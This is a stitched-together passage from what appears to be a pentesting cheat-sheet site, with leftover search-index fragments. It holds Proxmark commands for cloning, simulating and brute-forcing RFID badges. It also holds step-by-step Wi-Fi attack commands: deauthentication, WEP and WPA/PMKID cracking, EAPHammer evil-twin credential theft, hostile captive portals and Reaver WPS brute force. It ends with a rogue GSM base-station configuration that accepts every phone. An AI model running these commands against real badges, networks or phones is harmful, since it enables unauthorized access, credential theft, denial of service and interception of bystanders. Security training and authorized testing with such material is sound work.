\"151adf821ead26405ae583a2e751e42a80f4afff1bfeca482b39c9f1792f1e65879421798ed0ca6438fec238ccde6220a2495a3066358403d2523fd582ef61e2b1b8c70b0ca2bc92459062ab3d6e15ad37c1c26629a4e0bf5dd3f7b44b56ebd27fa0b1b705bd4efd6dce1b7c89ee8f3324bfb66ce58d3f4fb09328908d9bd9a6\"\n\"France Telecom\", 0x07AC, \"C44DBCD92F9DCF42F4902A87335DBB35D2FF530CDB09814CFA1F4B95A1BD018D099BC6AB69F667B4922AE1ED826E72951AA3E0EAAA7D49A695F04F8CDAAE2D18D10D25BD529CBB05ABF070DC7C041EC35C2BA7F58CC4C349983CC6E11A5CBE828FB8ECBC26F08E1094A6B44C8953C8E1BAFD214DF3E69F430A98CCC75C03669D\"\n\"France Telecom\", 0x07AC, \"9d66035cc7cc980a439fe6f34d21fdbae1c853894cb4a694108ef026bcecb88f82be5c1ae1c63c9849c3c48cf5a72b5cc31e047cdc70f0ab05bb9c52bd250dd1182daeda8c4ff095a6497daaeae0a31a95726e82ede12a92b467f669abc69b098d01bda1954b1ffa4c8109db0c53ffd235bb5d33872a90f442cf9d2fd9bc4dc4\"\n\"EDF-GDF\", 0x07AD, \"B35193DBD2F88A21CDCFFF4BF84F7FC036A991A363DCB3E802407A5E5879DC2127EECFC520779E79E911394882482C87D09A88B0711CBC2973B77FFDAE40EA0001F595072708C558B484AB89D02BCBCB971FF1B80371C0BE30CB13661078078BB68EBCCA524B9DD55EBF7D47D9355AFC95511350CC1103A5DEE847868848B235\"\n\"EDF-GDF\", 0x07AD, \"35b248888647e8dea50311cc50135195fc5a35d9477dbf5ed59d4b52cabc8eb68b0778106613cb30bec07103b8f11f97cbcb2bd089ab84b458c508270795f50100ea40aefd7fb77329bc1c71b0889ad0872c4882483911e9799e7720c5cfee2721dc79585e7a4002e8b3dc63a391a936c07f4ff84bffcfcd218af8d2db9351b3\"\nCloning requires writable T55xx card. The T55x7 card can be configured to emulate many of the 125 kHz tags.
lf search # HID Prox TAG ID: 2004263f88\nlf hid fskdemod # (Push the button on the PM3 to stop scanning - not necessary)\nlf hid demod # (Push the button on the PM3 to stop scanning - not necessary)\nlf hid clone 2004263f88 # (id \u00e0 cloner)\nlf hid sim 200671012d # simulate HID card with UID=200671012d\n\nlf indala read\nlf indala demod\nlf indala sim a0000000c2c436c1 # simulate Indala with UID=a0000000c2c436c1\nlf indala clone a0000000c2c436c1 # clone Indala to T55x7 card\n\nlf hitag info\nlf hitag sim c378181c_a8f7.ht2 # simulate HiTag\nRead only memory :/
Proxmark> lf em4x em410xread\nEM410x Tag ID: 23004d4dee\nProxmark> lf em4x em410xsim 23004d4dee\nproxmark3> lf hid decode 10001fc656\n-------------------------------------------------- \n Format: H10302 (HID H10302 37-bit huge ID) \n Card Number: 1041195 \n Parity: Valid \n-------------------------------------------------- \n Format: H10304 (HID H10304 37-bit) \nFacility Code: 1 \n Card Number: 516907 \n Parity: Valid \n-------------------------------------------------- \n# version with facility code is better\nproxmark3> lf hid encode H10304 f 49153 c 516907\nHID Prox TAG ID: 1c001fc656 \n\nproxmark3> lf hid encode H10302 c 1041195\nHID Prox TAG ID: 10001fc656 \n-------------------------------------------------\nExample 2
proxmark3> lf hid decode 1c0006bb43\n-------------------------------------------------- \n Format: H10302 (HID H10302 37-bit huge ID) \n Card Number: 220577 \n Parity: Valid \n-------------------------------------------------- \n Format: H10304 (HID H10304 37-bit) \nFacility Code: 49152 \n Card Number: 220577 \n Parity: Valid \n-------------------------------------------------- \nproxmark3> lf hid encode H10302 c 220577\nHID Prox TAG ID: 100006bb43 \npm3 --> lf hid brute a 26 f 224\npm3 --> lf hid brute v a 26 f 21 c 200 d 2000\n\nOptions\n---\na <format> : 26|33|34|35|37|40|44|84\nf <facility-code> : 8-bit value HID facility code\nc <cardnumber> : (optional) cardnumber to start with, max 65535\nd <delay> : delay betweens attempts in ms. Default 1000ms\nv : verbose logging, show all tries\nRadio Frequency Identification (RFID) & Near Field Communication (NFC)
"},{"location":"protocols/rfid-nfc/readme/#notes-about-card-types","title":"Notes about card types","text":""},{"location":"protocols/rfid-nfc/readme/#high-frequency","title":"High Frequency","text":"Around 13.56 MHz.
Usually around 125 kHz.
Replay attack is a technique where a malicious user could implement a device to intercept a NFC transaction and redeem it later, using other device or even in different location.
"},{"location":"protocols/rfid-nfc/readme/#relay-attack","title":"Relay Attack","text":"The relay attack is a technique where a malicious user implements a man in the middle attack. The attacker(APDUer) is capable to intercept, manipulate and change the transaction in real time to take advantage of it. https://en.wikipedia.org/wiki/Relay_attack
AP_MAC=\"XX:XX:XX:XX:XX\" # BSSID\nVICTIM_MAC=\"XX:XX:XX:XX:XX\" # VIC\nATTACKER_MAC=\"XX:XX:XX:XX:XX\" # MON\nAP_SSID=\"wifibox\" # ESSID\nSRC_ADDR=\"192.168.1.1\"\nDST_ADDR=\"192.168.1.255\"\n# driver install\napt install realtek-rtl88xxau-dkms\n\n# network card recon\niwconfig\niw list\ndmesg | grep 8187 # alfa card\n\n# Increase Wi-Fi TX Power\niw reg set B0\niwconfig wlan0 txpower <NmW|NdBm|off|auto> # txpower is 30 (usually)\n\n# find SSID and channel\niw dev wlan0 scan | grep SSID\niw dev wlan0 scan | egrep \"DS\\ Parameter\\ set|SSID\"\niwlist wlan0 scanning | egrep \"ESSID|Channel\"\n\n# monitor mode - start\nairmon-ng start wlan0\nairmon-ng start wlan0 3 # only on a particular channel e.g: 3\n * Manual 1: iw dev wlan0 interface add mon0 type monitor\n * Manual 2: iwconfig wlan0 mode monitor channel 3\nifconfig mon0 up\n# monitor mode - stop\nairmon-ng stop mon0\n * Manual 1: iw dev wlan0 interface del mon0 \n * Manual 2: iwconfig wlan0 mode managed\n# check and kill processes that could interfere with our monitor mode\nairmon-ng check\nairmon-ng check kill\n# pkill dhclient; pkill wpa_supplicant; pkill dhclient3\n\n# list AP\nairodump-ng mon0\nairodump-ng mon0 -c 3 # only on a particular channel e.g: 3\nairodump-ng mon0 -c 3 --bssid $AP_MAC -w clearcap # dump traffic\n\n# get our macaddress\nmacchanger -s mon0 \nmacchanger --show mon0\n\n# replay and accelerate traffic\naireplay-ng\n * -i interface\n * -r file.pcap\n\n# check aireplay card compatibility\naireplay-ng -9 mon0 -> test injection\naireplay-ng -9 -i wlan1 mon0 -> test card to card injection\n\n# injection rate\niwconfig wlan0 rate 1M\n\n# Aircrack compatibility\nhttp://www.aircrack-ng.org/doku.php?id=compatibility_drivers#list_of_compatible_adapters\nAlfa AWUS036H / TPLink WN722\nuse it before each attack
airodump-ng -c 3 --bssid $AP_MAC -w wep1 mon0\n\n# fake authentication = no arp\naireplay-ng -1 0 -e AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0\n * Might need a real $ATTACKER_MAC, observe traffic using airodump\n > Association successful! :-)\n\n# fake authentication for picky AP\n# Send keep-alive packets every 10 seconds\naireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>\n\n# might need to fake your MAC ADDRESS first\nForce ARP packet to be sent.
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n * -0 : 1 deauthentication, 0 unlimited\n > Sending 64 directed DeAuth.\nVideo: wifu-20.mp4 The attack listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the AP to repeat the ARP packet with a new IV. By collecting enough of these IVs Aircrack-ng can then be used to crack the WEP key.
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0\n * ATTACKER_MAC if fake authentication launched\n * CONNECTED_MAC if a client is associated\n\n# \u2013x 1000 \u2013n 1000 ?\n# aireplay-ng -3 \u2013x 1000 \u2013n 1000 \u2013b $AP_MAC -h $ATTACKER_MAC wlan0mon\n# wait for ARP on the network\n# alternatively you can de-auth some clients\n\naircrack-ng \u2013b <BSSID> <PCAP_of_FileName>\naircrack-ng -0 wep1.cap\n * -0 : colored output\nWPA EAP refers to the use of the Extensible Authentication Protocol (EAP) within the context of the Wi-Fi Protected Access (WPA) security standard for wireless networks. WPA is a suite of security protocols to secure wireless local area networks (WLANs) and is a response to the vulnerabilities of the older Wired Equivalent Privacy (WEP) standard. WPA EAP is specifically associated with the enterprise mode of WPA, which uses 802.1X authentication to provide a higher level of security compared to the personal mode of WPA, which uses a pre-shared key (PSK).
s0lst1c3/eaphammer - Targeted evil twin attacks against WPA2-Enterprise networks.
git clone https://github.com/s0lst1c3/eaphammer.git\n./kali-setup\n\n# generate certificates\n./eaphammer --cert-wizard\n\n# launch attack\n./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds\n\n# deauth users and wait for them to connect to our AP\naireplay-ng -0 0 -a MAC_ADDR_AP -c MAC_ADDR_CIBLE wlan0mon\nStealing RADIUS Credentials Using EAPHammer
./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid Example --channel 2 --interface wlan0 --auth wpa-eap --creds\nStealing AD Credentials Using Hostile Portal Attacks
./eaphammer --interface wlan0 --bssid 1C:7E:E5:97:79:B1 --essid EvilC0rp --channel 6 --auth wpa-eap --hostile-portal\n./eaphammer --interface wlan0 --essid TotallyLegit --hw-mode n --channel 36 --auth open --hostile-portal\nPerforming Captive Portal Attacks - Evil Twin Attacks
./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid HappyMealz --channel 149 --interface wlan0 --captive-portal\n./eaphammer --captive-portal -e guestnet -i wlan0 --portal-template rogue-cert-prompt --lhost 10.0.0.10 --payload secure.crt\nairmon-ng start wlan0 3\nairodump-ng -c 3 -d $ATTACKER_MAC -w airbase mon0\n\n# basic fake AP\nairbase-ng -c 3 -e $AP_SSID mon0\nairbase-ng -c 3 -e $AP_SSID -z 4 -W 1 mon0\n-W 1 : WEP\n\n# get a WPA handshake if the client connect\naircrack-ng -w /pentest/passwords/john/password.lst airbase-01.cap\n# install a dhcp server\napt install dhcp3-server\n\nairmon-ng start wlan0 3\nairbase-ng -c 3 -P -C 60 -e $AP_MAC -v mon0\n-P: respond to all probes\nifconfig at0 up 10.0.0.1/24\n\nmkdir -p /var/run/dhcpd\nchown -R dhcpd:dhcpd /var/run/dhcpd\ntouch /var/lib/dhcp3/dhcpd.leases\n\n\"CONF DHCP FROM VIDEO 75\" > /tmp/dhcpd.conf\n\ntouch /tmp/dhcp.log\nchown -R dhcpd:dhcpd /tmp/dhcp.log\ndhcpd3 -f -cf /tmp/dhcpd.conf -pf /var/run/dhcpd/pid -lf /tmp/dhcp/log at0\n\nkarma.rc from metasploit\n# comment the first 2 lines (load sqlite)\nmsfconsole -r /root/karma.rc\nairmon-ng start wlan0 3\nairbase-ng -c 3 -e $AP_SSID_SPOOFED mon0\n\n# create a bridged interface\n# apt-get install bridge-utils\nbrctl addbr hacker\nbrctl addif hacker eth0\nbrctl addif hacker at0\n\n# assign IP addresses\nifconfig eth0 0.0.0.0 up\nifconfig at0 0.0.0.0 up\nifconfig hacker 192.168.1.8 up\n\n# enable IP forwarding\necho 1 > /proc/sys/net/ipv4/ip_forward\n\n# mitm tools\ndriftnet\nettercap -G\nSniff > Unified sniffing > Hacker Interface\nairdecap-ng -b $AP_MAC open-network.cap\n* -dec.cap: stripped version of the file\nairdecap-ng -w $WEP_KEY wep.cap\nairdecap-ng -e $AP_SSID -p $WPA_PASSWORD tkip.cap\nairmon-ng start wlan0 3\nairserv-ng -p 1337 -c 3 -d mon0\nairodump-ng -c 3 --bssid $AP_MAC $HOST:$PORT\nRequire wireless key and bssid
airmon-ng start wlan0 3\n\n# create the at0 interface\nairtun-ng -a $AP_MAC -w $WEP_KEY mon0\n# the interface will auto decrypt packets\nUse CSV file from airodump
CAPR Graph
airgraph-ng -i wifu-01.csv -g CAPR -o wifu-capr.png\n# color\n- green: wpa\n- yellow: wep\n- red: open\n- black: unknown\nCPG - Client Probe Graph
airgraph-ng -i wifu-01.csv -g CPG -o wifu-cpg.png\nkismet\n[enter][enter]\n[tab][close]\n\n# Select a source and begin a monitoring\nKismet > Add source > wlan0 > Add\n\n.nettxt: data\n.pcapdump: wireshark format\n# giskismet: kismet inside a SQL database\n> require a GPS receiver\n\ngpsd -n -N -D4 /dev/ttyUSB0\n-N : foreground \n-D : debugging level\n\n# kismet will gather SSID and GPS location\ngiskismet -x kismet.netxml\n\n# generate a kml file (Google Earth)\ngiskismet -q \"select * from wireless\" -o allaps.kml\ngiskismet -q \"select * from wireless where Encryption='WEP'\" -o wepaps.kml\n# Find Hidden SSID\naireplay-ng -0 20 \u2013a <BSSID> -c <VictimMac> mon0\n\n# Mac Filtering\nmacchanger \u2013-mac <VictimMac> wlan0mon\naireplay-ng -3 \u2013b <BSSID> -h <FakedMac> wlan0mon\n# MAC CHANGER\nifconfig wlan0mon down\nmacchanger \u2013-mac <macVictima> wlan0mon\nifconfig wlan0mon up\n\n# Deauth Global\naireplay-ng -0 0 -e hacklab -c FF:FF:FF:FF:FF:FF wlan0mon\n\n# Authentication DoS Mode\nmdk3 wlan0mon a -a $AP_MAC\n\n# Tshark - Filter and dislay data\ntshark -r Captura-02.cap -Y \"eapol\" 2>/dev/null\ntshark -i wlan0mon -Y \"wlan.fc.type_subtype==4\" 2>/dev/null\ntshark -r Captura-02.cap -Y \"(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) && wlan.addr==20:34:fb:b1:c5:53\" 2>/dev/null\n\n# Convert .cap with handshake to .hccap\naircrack-ng -J network network.cap\nAttack the ACCESS POINT
airmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng mon0 -c 3 --bssid $AP_MAC -w arpreplay # dump traffic\n\n# Fake authentication for a more reliable attack\naireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# ARP replay attack\naireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# Deauthentication\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# Cracking\naircrack-ng arpreplay.cap\nAttack a client to force new packets 0841 attack, or interactive packet replay is a WEP attack that allows for packet injection when ARP replay is not available/working.
airmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w clearcap mon0 # dump traffic\n\n# fake authentication for a more reliable attack\naireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# interactive replay attack (min arp 68, max arp 86)\naireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # interactive - natural selection of a packet\naireplay-ng -2 -b $AP_MAC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0 # interactive - force create a packet\n# Packet selection (ARP packets met the characteristics): \n# - APs will always repeat packets destined to the broadcast\n# - The packet will have the ToDS (To Distribution System) bit set to 1\n# answer \"y\" multiple times\n\n# cracking require ~> 250000 IVs\naircrack-ng -0 -z -n 64 clientwep-01.cap\n * -z: PTW attack\n * -n: number of bits in the WEP key\n\n# backup file with an ARP packet\naireplay-ng -2 -r replay.cap mon0\nPrerequisite:
# put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wepcrack mon0 # see no client\n\n# fake authentication attack with association timing (every 60s try to reassociate)\naireplay-ng -1 60 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 # should see a client in airodump\n# -1 6000 to avoid a time out.\nGoal: 1500 bytes of PRGA Atheros does not generate the correct packets unless the wireless card is set to the MAC address you are spoofing.
# attacker mac must be associated (fake auth)\n# Press \"Y\"\naireplay-ng -5 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# use our PRGA from the fragmentation attack to generate an ARP request\n# SRC_ADDR: 192.168.1.100 \n# DST_ADDR: 192.168.1.255, should not exist (broadcast address)\npacketforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y frag.xor -w inject.cap\n# -k: the destination IP i.e. in ARP, this is \"Who has this IP\"\n# -l: the source IP i.e. in ARP, this is \"Tell this IP\"\n\n# check the packet\ntcpdump -n -vvv -e -s0 -r inject.cap\n\n# inject our crafted packet\naireplay-ng -2 -r inject.cap mon0\n\n# crack the WEP key\n# Aircrack-ng will auto-update when new IVs are available\naircrack-ng -0 wepcrack\n\n# if 64-bit WEP is used, cracking time < 5 minutes \n# switch to 128-bit keys after 600000 IVs\n# use the `-f 4` after 2000000\naircrack-ng -n 64 <capture filename>\nCan't be used for every AP, might work when fragmentation fails Much slower than the fragmentation attack
# chopchop attack: -4\n# out decrypted: .cap\n# out prga: .xor\n# Press \"Y\" (choose a small packet)\naireplay-ng -4 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# check the packet and find the network addresses\ntcpdump -n -vvv -e -s0 -r inject.cap\n\n# use our PRGA from the fragmentation attack\n# SRC_ADDR: 192.168.1.100 \n# DST_ADDR: 192.168.1.255, should not exist (broadcast address)\npacketforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y prga.xor -w chochop_out.cap\n\n# inject our crafted packet\naireplay-ng -2 -r chochop_out.cap mon0\n\n# crack the WEP key\naircrack-ng -0 wepcrack\nBy default, most wireless drivers will attempt open authentication first. If open authentication fails, they will proceed to try shared authentication.
Prerequisite:
AP rejects open-system authentication# put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w sharedkey mon0\n\n# deauthentication attack on the connected client\n# airodump should display SKA under the AUTH column\n# PRGA file will be saved as xxxx.xor\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n# TO CHECK aireplay-ng -0 10 \u2013a $AP_MAC -c $VICTIM_MAC mon0\n\n# fake authentication attack with association timing (every 60s try to reassociate)\n# should display switching to Shared Key Authentication\n# If you are using a PRGA file obtained from a chopchop attack, make sure that it is at least 144 bytes long\n# If you have \"Part2: Association Not answering...(Step3)\" -> spoof the mac address used to fake auth\naireplay-ng -1 60 -e $AP_SSID -y sharedkey.xor -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# ARP replay attack\naireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0\n\n# deauthentication attack on the connected client\n# speed the ARP attack process using deauth\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n# TO CHECK: aireplay-ng \u2013-deauth 1 \u2013a $AP_MAC -h <FakedMac> wlan0mon\n\n# crack the WEP key\naircrack-ng sharedkey.cap\n# put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wpajohn mon0 # see no client\n\n# deauthentication to get the WPA handshake (Sniffing should show the 4-way handshake)\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# crack without john the ripper (-b <BSSID>)\naircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap\naircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap \naircrack-ng -w password.lst,secondlist.txt wpajohn-01.cap # multiple dicts\n\n# crack with john the ripper - combine mangling rules with aircrack\n# rules example to add in /pentest/passwords/john/john.conf\n# $[0-9]$[0-9]\n# $[0-9]$[0-9]$[0-9]\njohn --wordlist=/pentest/wireless/aircrack-ng/test/password.lst --rules --stdout | aircrack-ng -0 -e $AP_SSID -w - /root/wpajohn\n\n# generate PMKs for a faster cracking - Precomputed WPA Keys Database Attack\necho wifu > essid.txt\nairolib-ng test.db --import essid essid.txt\nairolib-ng test.db --stats\nairolib-ng test.db --import passwd /pentest/passwords/john/password.lst\nairolib-ng test.db --batch\nairolib-ng test.db --stats\naircrack-ng -r test.db wpajohn-01.cap\n# airolib-ng test.db --clean all\n\n# Not in lab - Convert to hccap to use with John Jumbo\naircrack-ng <FileName>.cap -J <outFile>\nhccap2john <outFile>.hccap > <JohnOutFile>\njohn <JohnOutFile>\nBetter for PMK Rainbow table attacks
# put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wpacow mon0 # see no client\n\n# deauthentication to get the WPA handshake\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# coWPAtty dictionary mode (slow)\ncowpatty -r wpacow-01.cap -f /pentest/passwords/john/password.lst -2 -s $AP_SSID\n\n# coWPAtty rainbow table mode (fast)\ngenpmk -f /pentest/passwords/john/password.lst -d wifuhashes -s $AP_SSID\ncowpatty -r wpacow-01.cap -d wifuhashes -2 -s $AP_SSID\nCan use GPU
# put into monitor mode on our desired channel\nairmon-ng start wlan0 3 # only a particular channel : 3\nairodump-ng -c 3 --bssid $AP_MAC -w wpapyrit mon0 # see no client\n\n# deauthentication to get the WPA handshake\naireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0\n\n# clean the cap and extract only good packets\npyrit -r wpapyrit-01.cap analyze\npyrit -r wpapyrit-01.cap -o wpastripped.cap strip\n\n# dictionary attack - slow ++\npyrit -r wpapyrit-01.cap -i /pentest/passwords/john/password.lst -b $AP_MAC attack_passthrough\n\n# pre-computed hashes attack - slow on CPU\npyrit eval # pwds in database\npyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database\npyrit -e $AP_SSID create_essid\npyrit batch # generate\npyrit -r wpastripped.cap attack_db \n\n# gpu power attack - fast on GPU\npyrit list_cores\npyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database\npyrit -e $AP_SSID create_essid\npyrit batch\npyrit -r wpastripped.cap attack_db \nInstall Bettercap
# install and update\ngo get github.com/bettercap/bettercap\ncd $GOPATH/src/github.com/bettercap/bettercap\nmake build && sudo make install\nsudo bettercap -eval \"caplets.update; q\"\nScan for Wifi networks
# run and recon the wifi APs\nsudo bettercap -iface wlan0\n# this will set the interface in monitor mode and start channel hopping on all supported frequencies\n> wifi.recon on \n# we want our APs sorted by number of clients for this attack, the default sorting would be `rssi asc`\n> set wifi.show.sort clients desc\n# every second, clear our view and present an updated list of nearby WiFi networks\n> set ticker.commands 'clear; wifi.show'\n> ticker on\n# use the good channel\n> wifi.recon.channel 1\nExecute the deauth attack
# use the bssid of the AP\n> wifi.deauth e0:xx:xx:xx:xx:xx\n/path/to/cap2hccapx /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx\n/path/to/hashcat -m 2500 -a3 -w3 bettercap-wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d'\nairmon-ng start wlan0\nairodump-ng mon0\n\n# Install\napt-get -y install build-essential libpcap-dev aircrack-ng pixiewps\ngit clone https://github.com/t6x/reaver-wps-fork-t6x\napt-get install reaver\n\n# Reaver integrated dumping tool (can also airodump-ng)\n# Wash gives information about WPS being locked or not\n# Locked WPS will have less success chances\nwash -i mon0 \n\n# Launch Reaver\nreaver -i mon0 -b $AP_MAC -vv -S\nreaver -i mon0 -c <Channel> -b $AP_MAC -p <PinCode> -vv -S\nreaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv\n\n\n# Now using pixiexps, you can crack PIN offline\npixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>\n# Then, you can use the PIN with reaver to get to cleartext password\nreaver -i <monitor interface> -b <bssid> -c <channel> -p <PIN>\n\n\n# Some manufacturers have implemented protections\n# You can try different switches to bypass\n# -L = Ignore locked state\n# -N = Don't send NACK packets when errors are detected\n# -d = delay X seconds between PIN attempts\n# -T = set timeout period to X second (.5 means half second)\n# -r = After X attemps, sleep for Y seconds\nreaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv -L -N -d 15 -T .5 -r 3:15\nMessage \"WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying\" -> AP is protected Message \"WARNING: Receive timeout occured\" -> AP is too far
"},{"location":"protocols/wifi/wifi-wpa/#wpa-pmkid-attack","title":"WPA PMKID Attack","text":"INTERFACE=$(ifconfig | grep wlp | cut -d\":\" -f1) # mon0\n\n# PMKID capture\n# Note: Based on the noise on the wifi channel it can take some time to receive the PMKID. \n# It can take a while to capture PKMID (several minutes++)\n# We recommend running hcxdumptool up to 10 minutes before aborting.\n# If an AP recieves our association request packet and supports sending \n# sudo hcxdumptool -i wlan0mon -o outfile.pcapng --enable_status=1\nPMKID=$(sudo hcxdumptool -o test.pcapng -i $INTERFACE --enable_status --filtermode=2)\necho $PMKID|grep 'FOUND PMKID' &> /dev/null\nhcxpcaptool -z test.16800 test.pcapng\n\n# Then convert the captured data to a suitable format for hashcat\n# -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)\n# -I retrieve identities from WiFi-traffic\n# -U retrieve usernames from WiFi-traffic\n# PMKID*MAC AP*MAC Station*ESSID\n# 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a\nhcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng\n\n# Cracking the HASH\nhashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'\nhashcat -m 16800 -d 1 -w 3 myHashes rockyou.txt \n\n# Check clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR\nBettercap WPA - PMKID attack
wifi.assoc all\n/path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap\n/path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'\nDISCLAIMER: This procedure is highly illegal basically anywhere in the world. Be sure to run this in a closed RF environment (also know as Faraday Cage)
For this example we will use the Osmocom GSM Stack in the NITB (Network in the box) mode. In this mode the phones connected to you BTS will be able to call each other and send SMS messages. There is also the Interconnect mode in which the BSC (Base Station Controller) connects to a ISDN or IPBX (for example Asterisk) to manage the connected phones. You can check the different modes here: https://osmocom.org/projects/openbsc/wiki/OpenBSC#Configurations-Modes
For this article I will be using a Ubuntu 18.04 LTS as operating system since there are pre-compiled packages from LimeMicro that helps a lot. It should run in any linux distribution provided that it has the required packages and / or you compile the missing ones. I might make a tutorial later about how to install from the source code but for now I will stick to the pre-compiled packages.
"},{"location":"radio-frequency/limesdr-bts/#installing-the-required-packages","title":"Installing the required packages","text":"The first thing we need to do is to install all required packages. LimeMicro did a nice work and gathered everything pre compiled in their PPAs. So let\u2019s add them first:
sudo add-apt-repository -y ppa:myriadrf/drivers\nsudo add-apt-repository -y ppa:myriadrf/gnuradio\nLet\u2019s also add the osmocom binary builds:
wget https://download.opensuse.org/repositories/network:/osmocom:/latest/xUbuntu_18.04/Release.key\nsudo apt-key add Release.key\nrm Release.key\necho \"deb [https://download.opensuse.org/repositories/network:/osmocom:/latest/xUbuntu_18.04/](https://download.opensuse.org/repositories/network:/osmocom:/latest/xUbuntu_18.04/) ./\" | sudo tee /etc/apt/sources.list.d/osmocom-latest.list\nsudo apt-get update\nThen we can install required packages:
sudo apt install osmocom-nitb osmo-trx-lms osmo-bts-trx limesuite\nThese packages are:
osmocom-nitb => Network in a Box Package. Contains all needed stuff for managing GSM Networkosmo-bts-trx => The Base Transceiver Station software that manages how the network packets will be sent.osmo-trx-lms => The LimeSDR \u201cfrontend\u201d for the BTS. This is the piece of software that actually communicates with LimeSDRlimesuite => The software and driver for the LimeSDRIt is a good pratice to check if your LimeSDR firmware is up to date. To check and update if needed, you only need to run:
LimeUtil --update\nIt should do everything that is needed to update
"},{"location":"radio-frequency/limesdr-bts/#creating-the-configuration-files","title":"Creating the configuration files","text":"There are few files that need to be created. Let\u2019s first start with the OpenBSC config file openbsc.cfg:
!\n! OpenBSC configuration saved from vty\n! !\npassword foo\n!\nline vty\n no login\n!\ne1_input\n e1_line 0 driver ipa\nnetwork\n network country code 901\n mobile network code 70\n short name HUEHUE\n long name HUEBRNetwork\n auth policy accept-all\n location updating reject cause 13\n encryption a5 0\n neci 1\n rrlp mode none\n mm info 1\n handover 0\n handover window rxlev averaging 10\n handover window rxqual averaging 1\n handover window rxlev neighbor averaging 10\n handover power budget interval 6\n handover power budget hysteresis 3\n handover maximum distance 9999\n bts 0\n type sysmobts\n band GSM900\n cell_identity 0\n location_area_code 1\n training_sequence_code 7\n base_station_id_code 63\n ms max power 15\n cell reselection hysteresis 4\n rxlev access min 0\n channel allocator ascending\n rach tx integer 9\n rach max transmission 7\n ip.access unit_id 1801 0\n oml ip.access stream_id 255 line 0\n gprs mode none\n trx 0\n rf_locked 0\n arfcn 100\n nominal power 23\n max_power_red 20\n rsl e1 tei 0\n timeslot 0\n phys_chan_config CCCH+SDCCH4\n timeslot 1\n phys_chan_config SDCCH8\n timeslot 2\n phys_chan_config TCH/F\n timeslot 3\n phys_chan_config TCH/F\n timeslot 4\n phys_chan_config TCH/F\n timeslot 5\n phys_chan_config TCH/F\n timeslot 6\n phys_chan_config TCH/F\n timeslot 7\n phys_chan_config TCH/F\nnetwork country code 901\nmobile network code 70\nshort name HUEHUE\nlong name HUEBRNetwork\nauth policy accept-all\nnetwork country code => That is the MCC of the network operator. It says in which country the operator is operating. For example: 724 is Brazilmobile network code => That is the MNC of the network operator. It says which network operator it is. Every mobile network operator has its own MNC (some of them have more than one).short name => The Short name of the network operatorlong name => The Long Name of the network operatorauth policy => How we will accept the phones that are trying to connect.Be careful setting these settings specially with a accept-all policy. If you set to an existing mobile operator, any phone that is close to your LimeSDR will connect to it. The names of the operator (at least in a Android Device) only appears after connecting to it.
That openbsc.cfg file will be used by osmo-nitb software. The next file is osmo-bts.cfg
